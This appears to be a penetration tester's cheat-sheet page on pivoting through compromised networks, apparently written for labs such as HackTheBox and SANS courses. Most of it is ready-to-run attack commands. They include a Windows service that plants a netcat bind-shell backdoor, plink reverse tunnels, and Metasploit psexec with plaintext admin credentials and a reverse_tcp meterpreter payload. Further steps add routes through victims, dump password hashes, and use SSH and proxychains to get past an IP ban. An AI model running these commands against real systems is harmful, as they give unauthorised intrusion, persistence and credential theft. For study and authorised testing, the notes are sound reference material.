Pivots

Windows backdoor

sc creates: nc listener service
cmd dies after 30 seconds - 'takes the bullet'
Service continues to run
If you dont do this.. you'll have a dead/unresponsive service

sc \\serv1 create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 2222 -e cmd.exe"
sc \\serv1 query ncsvc
sc \\serv1 start ncsvc

nc.exe -nv 10.x.x.x 2222 ..Connect!!!
sc \\serv1 delete ncsvc  ..Cleanup

Windows Port Fwd: plink

If Vuln app is listening to Internal Port
Lets forward port on Kali to internal Windows port

Win: Disable ports:
netsh advfirewall set allprofiles state on

kali:
> winexe -U 'admin%password123' --system //192.168.win cmd.exe
connects on 445 by default
now fails

kali:
nc -nvlp 53

pkill --full smbserver.py   ..kill our smb
vim /etc/ssh/sshd_config
PermitRootLogin yes
service ssh restart

plink
from makers of PuTTY
win: will connect and port-forward over 445
plink.exe [email protected] -R 445:127.0.0.1:445
                       from kali       local win

connects to kali on 445!

kali:
> winexe -U 'admin%password123' --system //127.0.0.1 cmd.exe
connects on 445 by default
now works!!

Firewall port redirect

Send incoming traffic on 8000 to port 80 on 10.3.2.1

----------------
Linux:
nc -l -p 8000 < mypipe | nc 10.3.2.1 80 > mypipe

Or:
echo '1' > /proc/sys/net/ipv4/conf/eth0/forwarding
iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 8000 -j DNAT --to-destination 10.3.2.1:80
iptables -A FORWARD -p tcp -d 10.3.2.1 --dport 80 -m state --state NEW,ESTABLISTHED,RELATED -j ACCEPT

----------------
Windows:
netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=10.3.2.1

SSH Pivots

Local

------------------------------------
> ssh bob@one:2222
> ssh bob@one:2222 -L 8000:mary@two:80
> http://localhost:8000

------------------------------------
> ssh -L 8888:webserver:80 user2@pivot

Listener is Attacker.. my port 8888

Traffic to my 8888 port.. will go to webserver80 and over to 'pivot'               
Appears to come from Pivot ? Weird

curl http://127.0.0.1:8888 ..would go to the webserver


------------------------------------
x.x.x.1> ssh -L 8000:localhost:80 [email protected]

No proxy setup needed
my port 8000
port 80 on remote 'localhost' x.x.x.2


------------------------------------
x.x.x.1> ssh -L 8000:x.x.x.100:80 [email protected]
     me>        mypt      dest    middleman

my port 8000
to non-routable x.x.x.100 port 80
using [email protected]

http://localhost:8000 give us x.x.x.100 website


------------------------------------
> ssh mike@mongo1 -L 4444:mongo2:27017 
> mongo --port:4444
..will tell mongo to hit local 4444
..which goes through mongo1
..over to mongo2 on port 27017

------------------------------------
Scenario:
VNC target running on port 5901 internal-only 

> ssh -L 4444:localhost:5901 [email protected]
> vncviewer -passwd secret localhost:4444

Reverse

> ssh -R :8000:webserver:80 user2@pivot
           |
       All interfaces
               |
Pushing my webserver out to the pivot system

Dynamic

------------------------------------
> ssh -D 9000 user2@pivot

firefox to use Socks Proxy on 9000
or
> proxychains smbclient -L fileserver1


------------------------------------
> ssh -D 8080 [email protected]

localhost will now respond 8080
on x.x.x.1 to x.x.x.2

Firefox proxy 
Socks Host v5 127.0.0.1 8080

Browser can get to x.x.x.100 website from x.x.x.1
Putty can do this too

------------------------------------
> ssh -D 4444 -L801:127.0.0.1:5801 -L901:127.0.0.1:5901 charix@$IP

Scenario: 
VNC target running on port 5801/5901 internal-only 

Dynamic port forward to 4444
Local 801 > remote127:5801
Local 901 > remote127:5901

curl http://127.0.0.1:801
curl http://127.0.0.1:901

vncviewer 127.0.0.1::901                  ..fail
vncviewer -passwd secret 127.0.0.1::901   ..ok

Metasploit Pivots

---------------------------------------------------------------
---------------------------------------------------------------
msf> exploit
msf> Ctrl-Z to bg session
msf> route add [victim2_subnet] [netmasp] [sid]
msf> use exploit2
msf> set RHOST xx
msf> set PAYLOAD xx
msf> exploit


---------------------------------------------------------------
---------------------------------------------------------------
Meterpreter 'portfwd'

portfwd add -l 1234 -r 10.9.8.7 -p 80
                        |
                       Target

---------------------------------------------------------------
---------------------------------------------------------------
Meterpreter SOCKS Proxy

mtp> run post/multi/manage/autoroute SUBNET=10.10.10.0 CMD=add
mtp> back   ..background
msf> use auxiliary/server/socks4a
msf> set SRVPORT 9000
msf> run

---------------------------------------------------------------
---------------------------------------------------------------
Meterpreter: autoroute

First:
Setup psexec msf session to x.10
msfconsole
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 10.10.10.10
set LHOST 10.10.75.101 ..local
set SMBUSER administrator
set SMBPASS sansnight
show options
exploit ..connected!!!

Set the Route:
Use this connection to GET to x.20 (not accessible)
info post/multi/manage/autoroute
run post/multi/manage/autoroute SUBNET=10.10.10.0 CMD=add
background
route print  ..to view route! Gateway: Session 1

Can now get to 20:
show options
set RHOSTS 10.10.10.20
exploit ..connected to 20!
sysinfo
ipconfig

run post/windows/gather/smart_hashdump   ..pulled hashes on 20 - nice!!!
Win !!!


---------------------------------------------------------------
---------------------------------------------------------------
SSH Tunnel and MSF

Local Port Forward:
ssh -L 7777:10.10.10.20:445 [email protected]
My local |     |                  |
               |                  | routed through 50
               | connect to 20

set LHOST 10.10.75.101
set RHOSTS 127.0.0.1   ..myself
set RPORT 7777         ..my port
exploit


---------------------------------------------------------------
---------------------------------------------------------------
SSH Dynamic and MSF Socks Proxy

ssh -D 9999 [email protected]
My local | |      |
           |      | routed through 50
           | connect to ANY

MSF>
set LHOST 10.10.75.101   ..normal
set LPORT 4444           ..normal
set RHOSTS 10.10.10.20   ..actual target
set RPORT 445            ..actual target
show options
set Proxies socks4:127.0.0.1:9999
set ReverseAllowProxy true
exploit ..win! Jumps through local port-forward
sysinfo

Beauty is: 
You can update this line, and exploit next server:
set RHOSTS 10.10.10.20   ..actual target
exploit

Socks Proxy Note

----------------------------------------
The socks proxy is an oldie but a goodie
Like Colt 45... works every time.

Straightforward way to proxy vuln scans 
through a system accessed with meterpreter...
Currently labbing out a vuln scan through a compromised system as a pivot point
(meterpreter); there seems to be a few methodologies for this 
that I’ve been able to find 
(metasploit’s SOCKS module + proxychains, portfwd, SSH tunneling) 
but many are pretty dated (~2010) and results have been mixed.  

----------------------------------------
If you have a compromised Linux machine 
you can use the iproute2 package 
to set up layer three tunnels rather easily 
by creating virtual TUN interfaces

----------------------------------------
If you're compromised machine is Windows 
and happens to be SSH capable such as Windows 10 
you can set the PermitTunnel option. 
(This is distinct from the popular AllowTcpForwarding option 
which is commonly referred to as "SSH tunneling" 
which actually just forwards packets to a socks proxy)

----------------------------------------
My personal opinion creating TUN or TAP tunnels through SSH is ideal.  
You may have to Google a little bit to understand how to work 
with this but when done properly you will have created a 
virtual network interface that functions as either a 
layer two or layer three VPN placing your device directly 
on the network you wish to be scanning

Proxychains

Scenario: Avoid a 'ban' by routing through another host
We are banned by (10.x.x.60)
SSH Port Forward (dynamic) to a new box (10.x.x.75)
REF: MetasploitPivotProxySocks5_PFSense

ssh -D1080 10.x.x.75                      ..routed to .75 via port 1080
kali> netstat -alnp | grep LIST | 1080    ..confirm

Burp:
Use Socks 5 Proxy: 127.0.0.1:1080         ..can now connect to 10.x.x.60

curl -k https://10.x.x.60                 ..fail
vi /etc/proxychains.conf                  ..setup proxychains
socks5 127.0.0.1 1080                     ..point to 1080
proxychains curl -k https://10.x.x.60     ..ok

SSH ProxyJump

ProxyJump:
ssh -J user@one:2222 mary@private

ProxyJump and Remote Tunnel:
ssh -J user@one:2222 mary@private -R deeper:58672:127.0.0.1:4444
nc -nlvp 4444

ProxyJump and Local Tunnel:
ssh -J user@one:2222 mary@private -L 7000:deeper:7000 &
nc -v localhost 7000

SSH Konami Code (pivot)

ssh port forward - while in a ssh session!
https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/
Dynamic Port Forward listening on localhost:1080 going to SSH
And you get to keep your session!
Scenario: VNC Server is only exposed locally on PoisonHTB (ref: ssh)

-----------
ssh myserver
<Enter>                    ..new line
~C                         ..commandline options for ssh
ssh> -D 1080               ..Dynamic port to 9001 

netstat -anlp | grep 1080  ..local to confirm listening

-----------
Firefox
New Proxy > Manual > 127.0.0.1 1080 SOCKSv5
(dont block localhost)

Firefox
http://127.0.0.1:5901      ..route through 1080 to vnc port 5901

-----------
Proxychains
vim /etc/proxychains.conf
socks5 127.0.0.1 1080
proxychains curl http://127.0.0.1:5901

Previousmongodb node NextRemote Execute

Last updated 2 years ago

Was this helpful?